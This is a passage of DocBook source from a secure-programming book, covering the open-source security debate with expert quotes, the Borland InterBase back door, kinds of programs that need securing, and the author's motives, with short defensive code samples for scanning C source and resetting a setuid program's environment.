Most programmers are not security people; they simply don't often
think like an attacker does.
</para></listitem>
<listitem><para>
Most security people are not programmers.
This was a statement made by some Bugtraq contributors, but it's not clear
that this claim is really true.
</para></listitem>
<listitem><para>
Most computer security models are terrible.
</para></listitem>
<listitem><para>
There is lots of ``broken'' legacy software.
Fixing this software (to remove security faults or to make it work with
more restrictive security policies) is difficult.
</para></listitem>
<listitem><para>
Consumers don't care about security.
(Personally, I have hope that consumers are beginning to care about security;
a computer system that is constantly exploited is neither useful
nor user-friendly.
Also, many consumers are unaware that there's
even a problem, assume that it can't happen to them, or think that
things cannot be made better.)
</para></listitem>
<listitem><para>
Security costs extra development time.
</para></listitem>
<listitem><para>
Security costs in terms of additional testing
(red teams, etc.).
</para></listitem>
</itemizedlist>
</para>
</sect1>

<sect1 id="open-source-security">
<title>Is Open Source Good for Security?</title>

<para>
There's been a lot of debate by security practitioners
about the impact of open source approaches on security.
One of the key issues is that open source exposes the source code
to examination by everyone, both the attackers and defenders,
and reasonable people disagree about the ultimate impact of this situation.
(Note - you can get the latest version of this essay by going to the
main website for this book,
<ulink url="http://www.dwheeler.com/secure-programs">
http://www.dwheeler.com/secure-programs</ulink>.)
</para>

<sect2 id="open-source-security-experts">
<title>View of Various Experts</title>

<para>
First, let's examine what security experts have to say.
</para>

<para>
Bruce Schneier is a well-known expert on computer security and cryptography.
He argues that smart engineers should ``demand
open source code for anything related to security'' [Schneier 1999],
and he also discusses some of the preconditions which must be met to make
open source software secure.
<!-- http://www.counterpane.com/crypto-gram-0205.html#1
Probably too detailed...
A basic rule of cryptography is to use published, public,
algorithms and protocols.
This principle was first stated in 1883 by Auguste Kerckhoffs:
in a well-designed cryptographic system, only the key needs to be secret;
there should be no secrecy in the algorithm.
Modern cryptographers have embraced this principle, calling
anything else "security by obscurity."
Any system that tries to keep its algorithms secret for security reasons
is quickly dismissed by the community, and referred to as "snake oil"
or even worse.
This is true for cryptography, but the general relationship between secrecy and security is more complicated than Kerckhoffs' Principle indicates. ...
Kerckhoffs' Principle generalizes to the following design guideline:
minimize the number of secrets in your security system.
To the extent that you can accomplish that,
you increase the robustness of your security.
To the extent you can't, you increase its fragility.
-->
Vincent Rijmen, a developer of the winning Advanced Encryption Standard (AES)
encryption algorithm, believes that
the open source nature of Linux
provides a superior vehicle for making security vulnerabilities easier
to spot and fix, ``Not only because more people can look at it, but,
more importantly, because the model forces people to write more clear
code, and to adhere to standards. This in turn facilitates security review''
[Rijmen 2000].
</para>

<para>
Elias Levy (Aleph1) is the former moderator of one of the most
popular security discussion groups - Bugtraq.
He discusses some of the problems in making open source
software secure in his article
<ulink url="http://www.securityfocus.com/commentary/19">"Is Open Source
Really More Secure than Closed?"</ulink>.
His summary is:
<blockquote>
<para>
So does all this mean Open Source Software is no better than closed
source software when it comes to security vulnerabilities? No. Open
Source Software certainly does have the potential to be more secure
than its closed source counterpart.
But make no mistake, simply being open source is no guarantee of security.
</para>
</blockquote>
</para>

<para>
Whitfield Diffie is the
co-inventor of public-key cryptography (the basis of much of Internet security)
and chief security officer and senior staff engineer at Sun Microsystems.
In his 2003 article
<ulink url="http://zdnet.com.com/2100-1107-980938.html">
Risky business: Keeping security a secret</ulink>,
he argues that proprietary vendors' claims that their software
is more secure because it's secret are nonsense.
He identifies and then counters two main claims made by proprietary vendors:
(1) that release of code benefits attackers more than anyone else because
a lot of hostile eyes can also look at open-source code, and
(2) that a few expert eyes are better than several random ones.
He first notes that while giving programmers access to a piece of software
doesn't guarantee they will study it carefully,
there is a group of programmers who can be expected to care deeply:
Those who either use the software personally or work for an
enterprise that depends on it.
"In fact, auditing the programs on which an enterprise depends for
its own security is a natural function of the enterprise's own
information-security organization."
He then counters the claim that release mainly benefits attackers, noting that
"As for the notion that open source's usefulness to opponents
outweighs the advantages to users, that argument flies in
the face of one of the most important principles in security:
A secret that cannot be readily changed should be regarded as a vulnerability."
He closes by noting that
<blockquote>
<para>
"It's simply unrealistic to depend on secrecy for security in
computer software.
You may be able to keep the exact workings of the program out of general
circulation, but can you prevent the code from being
reverse-engineered by serious opponents? Probably not."
</para>
</blockquote>


</para>

<para>
John Viega's article
<ulink url="http://dev-opensourceit.earthweb.com/news/000526_security.html">"The Myth of Open Source Security"</ulink> also discusses
issues, and summarizes things this way:
<blockquote>
<para>
Open source software projects can be more secure than closed
source projects. However, the very things that can make open
source programs secure -- the availability of the source code,
and the fact that large numbers of users are available to look
for and fix security holes -- can also lull people into a false
sense of security.
</para>
</blockquote>
</para>

<para>
<ulink url="http://www.linuxworld.com/linuxworld/lw-1998-11/lw-11-ramparts.html">Michael H. Warfield's "Musings on open source security"</ulink> is
very positive about the impact of open source software on security.
In contrast,
Fred Schneider doesn't believe that open source helps security, saying
``there is no reason to believe that the many eyes inspecting (open)
source code would be successful in identifying bugs that allow
system security to be compromised'' and claiming that
``bugs in the code are not the dominant means of attack'' [Schneider 2000].
He also claims that open source rules out control of the construction
process, though in practice there is such control - all major open source
programs have one or a few official versions with ``owners'' with
reputations at stake.
Peter G. Neumann discusses ``open-box'' software (in which source code
is available, possibly only under certain conditions), saying
``Will open-box software really improve system security?
My answer is not by itself, although the potential is considerable''
[Neumann 2000].
TruSecure Corporation, under sponsorship by Red Hat (an open source company),
has developed a paper on why they believe open source is more
effective for security [TruSecure 2001].
<ulink url="http://www-106.ibm.com/developerworks/linux/library/l-oss.html?open&amp;I=252,t=gr,p=SeclmpOS">Natalie Walker Whitlock's IBM DeveloperWorks article</ulink>
discusses the pros and cons as well.
Brian Witten, Carl Landwehr, and Michael Caloyannides [Witten 2001]
published in IEEE Software an article tentatively concluding that
having source code available should work in the favor of system security;
they note:
<blockquote>
<para>
``We can draw four additional conclusions from this discussion. First,
access to source code lets users improve system security -- if they have
the capability and resources to do so. Second, limited tests indicate that
for some cases, open source life cycles produce systems that are less
vulnerable to nonmalicious faults. Third, a survey of three operating
systems indicates that one open source operating system experienced less
exposure in the form of known but unpatched vulnerabilities over a 12-month
period than was experienced by either of two proprietary counterparts.
Last, closed and proprietary system development models face disincentives
toward fielding and supporting more secure systems as long as less secure
systems are more profitable. Notwithstanding these conclusions, arguments
in this important matter are in their formative stages and in dire need of
metrics that can reflect security delivered to the customer.''
</para>
</blockquote>
</para>

<para>
Scott A. Hissam and Daniel Plakosh's
<ulink url="http://www.ics.uci.edu/~wscacchi/Papers/New/IEE_hissam.pdf">
``Trust and Vulnerability in Open Source Software''</ulink>
discusses the pluses and minuses of open source software.
As with other papers, they note that just because the software
is open to review, it should not automatically follow that
such a review has actually been performed.
Indeed, they note that this is a general problem for all software,
open or closed - it is often questionable if many people examine any
given piece of software.
One interesting point is that they demonstrate that
attackers can learn about a
vulnerability in a closed source program (Windows)
from patches made to an OSS/FS program (Linux).
In this example,
Linux developers fixed a vulnerability before attackers tried to attack it,
and attackers correctly surmised that a similar problem might still be in
Windows (and it was).
Unless OSS/FS programs are forbidden, this kind of learning is difficult
to prevent.
Therefore, the existence of an OSS/FS program can reveal the vulnerabilities
of both the OSS/FS and proprietary program performing the same function -
but in this example, the OSS/FS program was fixed first.
</para>
</sect2>

<sect2 id="open-source-security-nohalt">
<title>Why Closing the Source Doesn't Halt Attacks</title>

<para>
It's been argued that a
system without source code is more secure because,
since there's less information available for an attacker, it should
be harder for an attacker to find the vulnerabilities.
This argument has a number of weaknesses, however, because
although source code is extremely important when trying to add
new capabilities to a program,
attackers generally don't need source code to find a vulnerability.
</para>

<para>
First, it's important to distinguish between ``destructive'' acts
and ``constructive'' acts. In the real world, it is much easier to
destroy a car than to build one. In the software world, it is
much easier to find and exploit a vulnerability than to
add significant new functionality to that software.
Attackers have many advantages against defenders because of this difference.
Software developers must try to have no security-relevant mistakes
anywhere in their code, while attackers only need to find one.
Developers are primarily paid to get their programs to work...
attackers don't need to make the program work, they only need to
find a single weakness. And as I'll describe in a moment, it takes
less information to attack a program than to modify one.
</para>

<para>
Generally attackers (against both open and closed programs) start by
knowing about the general kinds of security problems programs have.
There's no point in hiding this information; it's already out, and
in any case, defenders need that kind of information to defend
themselves.
Attackers then use techniques to try to find those problems;
I'll group the techniques into ``dynamic'' techniques (where you
run the program) and ``static'' techniques (where you examine
the program's code - be it source code or machine code).
</para>

<para>
In ``dynamic'' approaches, an attacker runs the program,
sending it data (often problematic data), and sees
if the program's response indicates a common vulnerability.
Open and closed programs do not differ here, since the attacker isn't
looking at code.
</para>

<para>
Attackers may also look at the code, the ``static'' approach.
For open source software, they'll
probably look at the source code and search it for patterns.
For closed source software, they might search the machine code
(usually presented in assembly language format to simplify the
task) for essentially the same patterns.
They might also use tools called
``decompilers'' that turn the machine code back into source code
and then search the source code for the vulnerable patterns
(the same way they would search for vulnerabilities in open source software).
See Flake [2001] for one discussion of how closed code can still be examined
for security vulnerabilities (e.g., using disassemblers).
This point is important:
even if an attacker wanted to use source code to find a vulnerability,
a closed source program has no advantage, because the attacker
can use a decompiler to re-create source code for the product.
</para>
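
<para>
The static approach can be as simple as a text search.
As a minimal sketch, assuming the searcher (an attacker, or a defender
auditing the same code) has C source text in hand, the following Python
fragment flags calls to a few C library functions that are easy to misuse.
The list of function names, the helper name find_risky_calls, and the
sample text are all illustrative assumptions; real source code scanners
use much larger rule sets, and a match is only a hint worth examining,
not proof of a vulnerability.
</para>

<programlisting>
```python
import re

# Illustrative, far from exhaustive, list of C calls that are easy to misuse.
RISKY_CALLS = re.compile(r"\b(gets|strcpy|strcat|sprintf)\s*\(")


def find_risky_calls(source_text):
    """Return (line_number, function_name) pairs for each suspicious call."""
    hits = []
    for number, line in enumerate(source_text.splitlines(), start=1):
        for match in RISKY_CALLS.finditer(line):
            hits.append((number, match.group(1)))
    return hits


# Hypothetical C fragment used only to exercise the search.
sample = """
char buf[16];
gets(buf);
strcpy(buf, argv[1]);
strncpy(buf, argv[1], sizeof buf - 1);
"""

for number, name in find_risky_calls(sample):
    print(number, name)
```
</programlisting>

<para>
The same kind of pattern search can be applied to disassembled or
decompiled output, which is why hiding the source code does little
to stop it.
</para>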

<para>
Non-developers might ask ``if decompilers can create source code
from machine code, then why do developers say they need
source code instead of just machine code?''
The problem is that although developers don't need source
code to find security problems, developers do need source code to make
substantial improvements to the program.
Although decompilers can turn machine code back into a
``source code'' of sorts, the resulting source code
is extremely hard to modify. Typically most understandable names are
lost, so instead of variables like ``grand_total'' you get
``x123123'', instead of methods like ``display_warning'' you get
``f123124'', and the code itself may have spatterings of
assembly in it.
Also, <emphasis>all</emphasis> comments and design information are lost.
This isn't a serious problem for finding security problems, because
generally you're searching for patterns indicating vulnerabilities,
not for internal variable or method names.
Thus, decompilers can be useful for finding ways to attack programs,
but aren't helpful for updating programs.
</para>

<para>
Thus, developers will say ``source code is vital''
(when they intend to add functionality), but the fact that the source
code for closed source programs is hidden doesn't protect the program
very much.
</para>

<!--
Thus, defenders won't usually look for problems if they
don't have the source code, so not having the source code puts defenders
at a disadvantage compared to attackers.
-->
</sect2>

<sect2 id="open-source-security-secrets">
<title>Why Keeping Vulnerabilities Secret Doesn't Make Them Go Away</title>

<para>
Sometimes it's noted that a vulnerability that exists but is unknown
can't be exploited, so the system is ``practically secure.''
In theory this is true, but the problem is that once someone finds
the vulnerability, the finder may just exploit
the vulnerability instead of helping to fix it.
Having unknown vulnerabilities doesn't really make the vulnerabilities go away;
it simply means that the vulnerabilities are a time bomb, with no
way to know when they'll be exploited.
Fundamentally, the problem of someone exploiting a vulnerability they
discover is a problem for both open and closed source systems.
</para>

<para>
One related claim sometimes made
(though not as directly related to OSS/FS)
is that people should not post warnings about
vulnerabilities and discuss them.
This sounds good in theory, but the problem is that attackers already
distribute information about vulnerabilities through a large number
of channels.
In short, such approaches would leave
defenders vulnerable, while doing nothing to inhibit attackers.
In the past, companies actively tried to prevent disclosure of vulnerabilities,
but experience showed that, in general, companies didn't fix vulnerabilities
until they were widely known to their users (who could then insist that
the vulnerabilities be fixed).
This is all part of the argument for ``full disclosure.''
Gartner Group has a blunt commentary in a CNET.com article titled
``Commentary: Hype is the real issue - Tech News.''
They stated:
<blockquote>
<para>
The comments of Microsoft's Scott Culp, manager of the company's
security response center, echo a common refrain in a long, ongoing
battle over information. Discussions of morality regarding the
distribution of information go way back and are very familiar. Several
centuries ago, for example, the church tried to squelch Copernicus'
and Galileo's theory of the sun being at the center of the solar
system...
</para>
<para>
Culp's attempt to blame "information security professionals" for the
recent spate of vulnerabilities in Microsoft products is at best
disingenuous. Perhaps, it also represents an attempt to deflect
criticism from the company that built those products...
</para>
<para>
[The] efforts of all parties contribute to a continuous
process of improvement. The more widely vulnerabilities become known,
the more quickly they get fixed.
</para>
</blockquote>
<!-- http://technews.netscape.com/news/0-1003-201-7573979-0.html -->
<!-- Here's the entire text of the article:
   The  comments  of  Microsoft's  Scott  Culp,  manager of the company's
   security  response  center,  echo  a common refrain in a long, ongoing
   battle   over  information.  Discussions  of  morality  regarding  the
   distribution of information go way back and are very familiar. Several
   centuries  ago,  for  example, the church tried to squelch Copernicus'
   and  Galileo's  theory  of  the  sun  being at the center of the solar
   system,  and in the 20th century Darwin's writings about the theory of
   evolution were banned in a number of states in the United States.

  Culp's  attempt  to blame "information security professionals" for the
   recent  spate  of  vulnerabilities  in  Microsoft  products is at best
   disingenuous.  Perhaps,  it  also  represents  an  attempt  to deflect
   criticism from the company that built those products.

   Culp  has  also  manufactured  some  new numbers related to the losses
   suffered  by  companies  because of the vulnerabilities in Microsoft's
   Internet  Information  Server  (IIS).  Culp  says the losses amount to
   billions  of  dollars.  Gartner  believes  that  hype  associated with
   security  risks  is  the  real problem, and that companies engaging in
   hype are culpable.

   Security  firms  and  professionals  have already begun to cut back on
   self-serving press releases and hyperbole while they also research and
   discover   new   vulnerabilities   and   responsibly  disseminate  new
   information.  Thus,  to criticize those contributions to awareness and
   early  warning while using unfounded numbers to make a point is a shot
   gone  astray  in  the  ongoing  battle between information freedom and
   control.

   In  truth,  the  responsibility  for information security falls to the
   entire  IT  community - - software  companies, security firms, businesses
   and  individuals.  None  should  shoulder the whole blame for security
   lapses.  Rather, the efforts of all parties contribute to a continuous
   process  of improvement. The more widely vulnerabilities become known,
   the more quickly they get fixed.
-->

<!--
http://www.eweek.com/article/0,3658,s%253D701%2526a%253D26875,00.asp
May 13, 2002
Allchin: Disclosure May Endanger U.S.
By  Caron Carlson

...
He later acknowledged that some Microsoft code was so flawed it could not be safely disclosed.
The bold statements and candid admissions were part of Jim Allchin's testimony during two days in court here before Judge Colleen Kollar-Kotelly, who is hearing the case of nine states and the District of Columbia seeking stricter penalties for Microsoft's antitrust behavior.
 Microsoft has already identified at least one protocol and two APIs that it plans to withhold from public disclosure under the security carve-out.

The protocol, which is part of Message Queuing, contains a coding mistake that would threaten the security of enterprise systems using it if it were disclosed, Allchin said.
When pressed for further details, Allchin said he did not want to offer specifics because Microsoft is trying to work on its reputation regarding security. "The fact that I even mentioned the Message Queuing thing bothers me," he said.


Note, however, that Microsoft code has already escaped!
Besides, it can be trivially disassembled.
-->
</para>
</sect2>

<sect2 id="open-source-security-trojans">
<title>How OSS/FS Counters Trojan Horses</title>


<para>
It's sometimes argued that open source programs, because there's no
enforced control by a single company, permit people to insert Trojan
horses and other malicious code.
Trojan horses can be inserted into open source code, true, but they
can also be inserted into proprietary code.
A disgruntled or bribed employee can insert malicious code, and
in many organizations it's much less likely to be found than in an
open source program.
After all,
no one outside the organization can review the source code, and few
companies review their code internally (or, even if they do, few can
be assured that the reviewed code is actually what is used).
And the notion that a closed-source company can be sued later has little
evidence; nearly all licenses disclaim all warranties, and courts have
generally not held software development companies liable.
</para>

<para>
Borland's InterBase server is an interesting case in point.
Some time between 1992 and 1994, Borland inserted an intentional
``back door'' into their database server, ``InterBase''.
This back door allowed any local or remote user to
manipulate any database object and install arbitrary programs, and
in some cases could lead to controlling the machine as ``root''.
This vulnerability stayed in the product for at least 6 years - no one else
could review the product, and Borland had no incentive to remove the
vulnerability.
Then Borland released its source code in July 2000.
The "Firebird" project began working with the source code, and
uncovered this serious security problem
with InterBase in December 2000.
By January 2001 the CERT announced the existence of this back door as
<ulink url="http://www.cert.org/advisories/CA-2001-01.html">CERT
advisory CA-2001-01</ulink>.
What's discouraging is that the back door can be easily found simply by
looking at an ASCII dump of the program (a common cracker trick).
Once this problem was found by open source developers reviewing
the code, it was patched quickly.
You could argue that, by keeping the password unknown,
the program stayed safe, and that opening the source made
the program less secure.
I think this is nonsense, since ASCII dumps are trivial to do and well-known
as a standard attack technique, and not all attackers have sudden
urges to announce vulnerabilities - in fact, there's no way to be
certain that this vulnerability has not been exploited many times.
It's clear that after the source was opened, the source code was
reviewed over time, and the vulnerabilities found and fixed.
One way to characterize this is to say that the original code was
vulnerable, its vulnerabilities became easier to exploit
when it was first made open source,
and then finally these vulnerabilities were fixed.
<!--
     The 1992-1994 date is from
      http://slashdot.org/articles/01/01/11/1318207.shtml
  The December 2000 and other info is from:
  http://firebird.ibphoenix.com/home.nfs?a=ibphoenix&amp;s=979248432:339&amp;page=starkey
-->
</para>
</sect2>

<sect2 id="open-source-security-other">
<title>Other Advantages</title>


<para>
The advantages of having source code open extend not just to software
that is being attacked, but also to vulnerability assessment
scanners.
Vulnerability assessment scanners intentionally look for vulnerabilities
in configured systems.
A recent Network Computing evaluation found that the best scanner
(which, among other things, found the most legitimate vulnerabilities)
was Nessus, an open source scanner [Forristal 2001].
</para>
</sect2>

<sect2 id="open-source-security-bottom-line">
<title>Bottom Line</title>

<para>
So, what's the bottom line?
I personally believe that when a program began as closed source and
is then first made open source, it
often starts less secure for any users (through exposure of
vulnerabilities), and over time (say a few years) it has
the potential to be much more secure than a closed program.
If the program began as open source software, the public scrutiny is
more likely to improve its security before it's ready for use by
significant numbers of users, but there are several caveats to this
statement (it's not an ironclad rule).
Just making a program open source doesn't suddenly make a program secure,
and just because a program is open source does not guarantee security:
<itemizedlist>
<listitem><para>
First, people have to actually review the code.
This is one of the key points of debate - will people really
review code in an open source project?
All sorts of factors can reduce the amount of review:
being a niche or rarely-used product (where there are few potential reviewers),
having few developers, and use of a rarely-used computer language.
Clearly, a program that has a single developer and no other contributors
of any kind doesn't have this kind of review.
On the other hand, a program that has a primary author and many other
people who occasionally examine the code and contribute suggests that there
are others reviewing the code (at least to create contributions).
In general, if there are more reviewers, there's a higher likelihood
that someone will identify a flaw - this is the basis of the
``many eyeballs'' theory.
Note that, for example, the OpenBSD project continuously examines
programs for security flaws, so the components in its innermost parts
have certainly undergone a lengthy review.
Since OSS/FS discussions are often held publicly, this level of
review is something that potential users can judge for themselves.
</para>
<para>
One factor that can particularly reduce review likelihood is not actually
being open source.
Some vendors like to position their ``disclosed source''
(also called ``source available'') programs as
being open source, but since the program owner has extensive exclusive rights,
others will have far less incentive to work ``for free'' for the owner
on the code.
Even open source licenses which have unusually
asymmetric rights (such as the MPL) have this problem.
After all, people are less likely to voluntarily participate
if someone else will have rights to their results that they don't have
(as Bruce Perens says, ``who wants to be someone else's unpaid employee?'').
In particular,
since the reviewers with the most incentive tend to be people trying to modify
the program, this disincentive to participate reduces the number of
``eyeballs''.
Elias Levy made this mistake in his article about open source
security; his examples of software that had been broken into
(e.g., TIS's Gauntlet) were not, at the time, open source.
</para></listitem>
<listitem><para>
Second, at least some of the people developing and
reviewing the code must know how to write secure programs.
Hopefully the existence of this book will help.
Clearly, it doesn't matter if there are ``many eyeballs'' if none of the
eyeballs know what to look for.
Note that it's not necessary for everyone to know how to write
secure programs, as long as those who do know how are examining the
code changes.
</para></listitem>
<listitem><para>
Third, once found, these problems need to be fixed quickly
and their fixes distributed.
Open source systems tend to fix the problems quickly, but the distribution
is not always smooth.
For example, the OpenBSD developers do an excellent job of reviewing code for
security flaws - but they don't always report the identified
problems back to the original developer.
Thus, it's quite possible for there to be a fixed version in one system,
but for the flaw to remain in another.
I believe this problem is lessening over time, since no one
``downstream'' likes to repeatedly fix the same problem.
Of course, ensuring that security patches are actually installed on
end-user systems is a problem for both open source and closed source software.
</para></listitem>
</itemizedlist>
Another advantage of open source is that, if you find a problem, you can
fix it immediately.
This really doesn't have any counterpart in closed source.
</para>

<!--
 Could quote some numbers.  More NT than Linux vulnerabilities found in 2000;
 more NT web sites defaced, too.  But it's hard to really quantify.
-->

<para>
In short, the effect on security of open source software
is still a major debate in the security community, though a large number
of prominent experts believe that it has great potential to be
more secure.
</para>

</sect2>
</sect1>

<sect1 id="types-of-programs">
<title>Types of Secure Programs</title>

<para>
Many different types of programs may need to be secure programs
(as the term is defined in this book).
Some common types are:

<itemizedlist>
<listitem>
<para>
Application programs used as viewers of remote data.
Programs used as viewers (such as word processors or file format viewers)
are often asked to view data sent remotely by an untrusted user
(this request may be automatically invoked by a web browser).
Clearly, the untrusted
user's input should not be allowed to cause the application
to run arbitrary programs.
It's usually unwise to support initialization macros (run when the data
is displayed); if you must, then you must create a secure sandbox
(a complex and error-prone task that almost never succeeds, which is why
you shouldn't support macros in the first place).
Be careful of issues such as buffer overflow, discussed in
<xref linkend="buffer-overflow">, which might
allow an untrusted user to force the viewer to run an arbitrary program.
</para>
</listitem>

<listitem>
<para>
Application programs used by the administrator (root).
Such programs shouldn't trust information that can be controlled
by non-administrators.
</para>
</listitem>

<listitem>
<para>
Local servers (also called daemons).
</para>
</listitem>

<listitem>
<para>
Network-accessible servers (sometimes called network daemons).
</para>
</listitem>

<listitem>
<para>
Web-based applications (including CGI scripts).
These are a special case of network-accessible servers, but they're
so common they deserve their own category.
Such programs are invoked indirectly via a web server, which filters out
some attacks but nevertheless leaves many attacks that must be withstood.
</para>
</listitem>

<listitem>
<para>
Applets (i.e., programs downloaded to the client for automatic execution).
This is something Java is especially famous for, though other languages
(such as Python) support mobile code as well.
There are several security viewpoints here; the implementer of the
applet infrastructure on the client side has to make sure that the
only operations allowed are ``safe'' ones, and the writer of an applet has
to deal with the problem of hostile hosts (in other words, you can't
normally trust the client).
There is some research attempting to deal with running applets on
hostile hosts, but frankly
I'm skeptical of the value of these approaches
and this subject is exotic enough that I don't cover it further here.
</para>
</listitem>

<listitem>
<para>
setuid/setgid programs.
These programs are invoked by a local user and, when executed, are
immediately granted the privileges of the program's owner and/or
owner's group.
In many ways these are the hardest programs to secure, because so many
of their inputs are under the control of the untrusted user and some
of those inputs are not obvious.
</para>
</listitem>

</itemizedlist>

</para>
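
<para>
One of the less obvious inputs to a setuid/setgid program is the
environment it inherits from the invoking user.
The following is only a minimal sketch in C, not a complete defense:
the function name reset_environment is hypothetical, the PATH value
is an assumption about where trusted programs live on a given system,
and the code assumes the C library lets a program point environ at a
fresh array (as common Linux C libraries do).
</para>
<programlisting><![CDATA[
```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>

extern char **environ;

/* Hypothetical helper (not part of any library): discard every
   environment variable supplied by the invoking user, then set a
   known-safe PATH.  Returns 0 on success and -1 on failure. */
int reset_environment(void)
{
    /* An empty, program-owned environment: just the terminator. */
    static char *empty_environment[] = { NULL };

    environ = empty_environment;

    /* Assumed safe value; adjust for the target system. */
    if (setenv("PATH", "/bin:/usr/bin", 1) != 0)
        return -1;
    return 0;
}
```
]]></programlisting>
<para>
A privileged program would call such a helper very early, before
running any other program or calling library routines that consult
the environment, and would treat a failure as fatal.
Other inherited state (such as open file descriptors and the umask)
is not addressed by this sketch.
</para>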

<para>
This book merges the issues of these different types of programs into
a single set.
The disadvantage of this approach is that some of the issues identified
here don't apply to all types of programs.
In particular, setuid/setgid programs have many surprising inputs and several
of the guidelines here only apply to them.
However, things are not so clear-cut, because
a particular program may cut across these boundaries (e.g., a CGI script
may be setuid or setgid, or be configured in a way that has the same effect),
and some programs are divided into several executables each of which
can be considered a different ``type'' of program.
The advantage of considering all of these program types together is that we can
consider all issues without trying to apply an inappropriate category
to a program.
As will be seen, many of the principles apply to all programs that
need to be secured.
</para>

<para>
There is a slight bias in this book toward programs written in
C, with some notes on other languages such as C++, Perl, PHP, Python,
Ada95, and Java.
This is because C is the most common language for
implementing secure programs on Unix-like systems
(other than CGI scripts, which tend to use languages such as
Perl, PHP, or Python).
Also, most other languages' implementations call the C library.
This is not to imply that C is somehow the ``best'' language for this purpose,
and most of the principles described here apply regardless of the
programming language used.
</para>

</sect1>

<sect1 id="paranoia">
<title>Paranoia is a Virtue</title>

<para>
The primary difficulty in writing secure programs is that
writing them requires a different mind-set: in short, a paranoid mind-set.
The reason is that the impact of errors (also called defects or bugs)
can be profoundly different.
</para>

<para>
Normal non-secure programs have many errors.
While these errors are undesirable, they usually
involve rare or unlikely situations, and if a user should stumble upon
one they will try to avoid using the tool that way in the future.
</para>

<para>
In secure programs, the situation is reversed.
Certain users will intentionally search out and cause rare or unlikely
situations, in the hope that such attacks will give them unwarranted privileges.
As a result, when writing secure programs, paranoia is a virtue.
</para>

</sect1>

<sect1 id="why-write">
<title>Why Did I Write This Document?</title>
<!-- ???: Okay, this doesn't really belong here, but I can't figure out
     where else to put it.  I don't want the introduction to get longer. -->
<!-- ???: http://www.wired.com/news/politics/0,1283,34865,00.html
      "Developers Blasted on Security", Reuters, 8:45 a.m. Mar. 9, 2000 PST
      Rich Pethia stated to the U.S. Congress that
     "There is little evidence of improvement in the security features of most
             products,"
      "Developers are not devoting sufficient effort to apply lessons
                         learned about the sources of vulnerabilities."
     Richard D. Pethia is manager of the SEI Survivable Systems
     Initiative and first manager of the CERT Coordination Center (CERT/CC).
     (see Spotlight . Volume 1 . Issue 3 . December 1998,
      "Interview with Richard D. Pethia" by Bill Pollak at
      http://interactive.sei.cmu.edu/Features/1998/December/Spotlight/spotlight_dec98.htm
      This interview states "The problem that I see is at the implementation
      level - the code that's going out today is just as buggy as the code
      that went out 10 years ago."


??? : Somehow add:
"A secure and Open society"
August 27, 1999
by  Michael MacMillan
http://www.itworldcanada.com/cw/archive/cw15-17/cw_wtemplate.cfm?filename=c1517n8.htm
 ITworldcanada.com
(interview with  Theo de Raadt,
head of the OpenBSD project, which is focused on security.
The problem with professional programmers is not a lack of ability,
but lack of attention to detail, he said.
...
The secret is straightforward - de Raadt and his peers assume that
every single bug found in the code occurs elsewhere.
de Raadt admits it sounds simple, but just rooting security bugs
out of the entire source tree took 10 full-time developers
one and a half years to complete.
"It's a hell of a lot of work and I think that explains why it hasn't
been done by many people," he said.  www.openbsd.org.

???: add info about smartcards, e.g., how to code algorithms so the
key won't be exposed by power fluctuations.

-->


<para>
One question I've been asked is ``why did you write this book''?
Here's my answer:
Over the last several years I've noticed that many developers for
Linux and Unix
seem to keep falling into the same security pitfalls, again and again.
Auditors were slowly catching problems, but it would have been better
if the problems weren't put into the code in the first place.
I believe that part of the problem was that there wasn't a single, obvious
place where developers could go and get information on how to avoid
known pitfalls.
The information was publicly available, but it was often hard to find,
out-of-date, incomplete, or had other problems.
Most such information didn't particularly discuss Linux at all, even
though it was becoming widely used!
That leads up to the answer: I developed this book
in the hope that future software developers won't repeat
past mistakes, resulting in more secure systems.
You can see a larger discussion of this at
<ulink
url="http://www.linuxsecurity.com/feature_stories/feature_story-6.html">http://www.linuxsecurity.com/feature_stories/feature_story-6.html</ulink>.
</para>

<para>
A related question that could be asked is ``why did you write your own book
instead of just referring to other documents''?
There are several answers:

<itemizedlist>
<listitem>

<para>
Much of this information was scattered about; placing
the critical information in one organized document
makes it easier to use.
</para>
</listitem>
<listitem>

<para>
Some of this information is not written for the programmer, but
is written for an administrator or user.
</para>
</listitem>
<listitem>

<para>
Much of the available information emphasizes portable constructs
(constructs that work on all Unix-like systems), and
fails to discuss Linux at all.
It's often best to avoid Linux-unique abilities for portability's sake,
but sometimes the Linux-unique abilities can really aid security.
Even if non-Linux portability is desired, you may want to support
the Linux-unique abilities when running on Linux.
And, by emphasizing Linux, I can include references to information that
is helpful to someone targeting Linux that is not necessarily true for
others.
</para>
</listitem>

</itemizedlist>

</para>

</sect1>

<sect1 id="sources-of-guidelines">
<title>Sources of Design and Implementation Guidelines</title>

<para>
Several documents help describe how to write
secure programs (or, alternatively, how to find security problems in
existing programs), and were the basis for the guidelines highlighted
in the rest of this book.
<!-- ???: Add http://securityparadigm.com's "Computer Vulnerabilities" notes -->
<!-- ???: Add http://www.linuxhelp.org/lsap.shtml alternatively
    http://ferret.lmh.ox.ac.uk/~security
    Security-Audit's Frequently Asked Questions
     v 1.9 2000/03/21 01:01:08, Jeff Graham <lsap@demit.net> -->
<!-- I added fish (Dan Farmer's) refs at http://www.fish.com/security -->
<!-- ???  Really need to emphasize the risks of symbolic/hard links, esp.
     shared directories, such as /tmp.  Symbolic links to /dev/zero can
     really do bad things, symbolic links to /etc/passwd is of course
     an ancient attack.  -->
<!-- ??? Mention "terminal" and the possibility of retransmission back -->
<!-- ???: Traverse the Bugtraq archives, CERT advisories,
     MITRE's CVE at http://cve.mitre.org etc.
     to make sure I've covered the important stuff and pull out good
     examples/stories.  -->
<!-- ???: Add info and reference to
  Landwehr 1994.  Landwehr, Carl E., Alan R. Bull, John P. McDermott,
  and William S. Choi.  September 1994.
  A Taxonomy of Computer Program Security Flaws.
  ACM Computing Surveys. Vol. 26, No. 3.

http://scholar.lib.vt.edu/theses/available/etd-04252001-234145/
Lough, Daniel Lowry
"A Taxonomy of Computer Attacks with Applications to Wireless Network"
Published 2001.
Summary:
This research presents a comprehensive analysis of the types of attacks that are being leveled upon computer systems and the
construction of a general taxonomy and methodologies that will facilitate design of secure protocols. To develop a comprehensive
taxonomy, existing lists, charts, and taxonomies of host and network attacks published over the last thirty years are examined and
                        combined, revealing common denominators among them. These common denominators, as well as new information, are assimilated to
                        produce a broadly applicable, simpler, and more complete taxonomy. It is shown that all computer attacks can be broken into a taxonomy
                        consisting of improper conditions: Validation Exposure Randomness Deallocation Improper Conditions Taxonomy; hence described by the
                        acronym VERDICT.

